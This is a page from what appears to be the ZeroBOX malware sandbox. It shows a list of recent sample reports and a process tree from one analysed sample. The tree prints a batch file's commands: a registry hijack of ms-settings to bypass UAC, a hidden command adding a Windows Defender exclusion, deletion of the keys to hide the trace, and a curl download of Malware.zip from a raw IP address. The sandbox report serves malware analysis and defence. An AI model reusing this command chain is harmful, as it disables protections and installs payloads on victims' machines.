| ZeroBOX

Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

latestReport
01.18 04:01
svc.exe
01.18 04:01
RemittanceForms.exe
01.18 04:01
Aristois-Free.jar
01.18 10:01
setup641.msi
01.18 10:01
Needle_Setup.exe
01.18 10:01
8734_5737.exe
01.18 10:01
CondoGenerator.exe
01.18 10:01
QGFQTHIU.exe
01.18 10:01
4909_7122.exe
01.18 10:01
Updater.exe

Latest News
01.20 01:01
KI statt Kanzler? Drei...
01.20 01:01
Donald Trump und die T...
01.20 12:01
An Instant Gratificati...
01.19 10:01
Apple Is Unlikely to B...
01.19 09:01
DIY Handheld is an Emu...
01.19 07:01
Behörde stärkt Sicherh...
01.19 07:01
Keine Bewegung, kein S...
01.19 07:01
Computing und KI: Die ...
01.19 06:01
Motorized Coil Tunes Y...
01.19 05:01
Anzeige: Microsoft-365...

| ZeroBOX

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "iYxNOhPj" C:\Users\test22\AppData\Local\Temp\Bypass.bat
2540
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Bypass.bat
  2620
  - reg.exe reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /v "" /d "C:\Users\test22\AppData\Local\Temp\X.exe -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\ServiceHub'}" /f
    2712
  - reg.exe reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f
    2756
  - timeout.exe timeout "3"
    2824
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo yes "
    2888
  - reg.exe reg delete "HKCU\Software\Classes\.thm\Shell\Open\command" /f
    2924
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo yes "
    2976
  - reg.exe reg delete "HKCU\Software\Classes\ms-settings\CurVer" /f
    3012
  - timeout.exe timeout "60"
    3068
  - curl.exe curl "45.66.230.113/Malware.zip" -O "C:\Users\test22\AppData\Local\ServiceHub\Malware.zip"
    2744

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf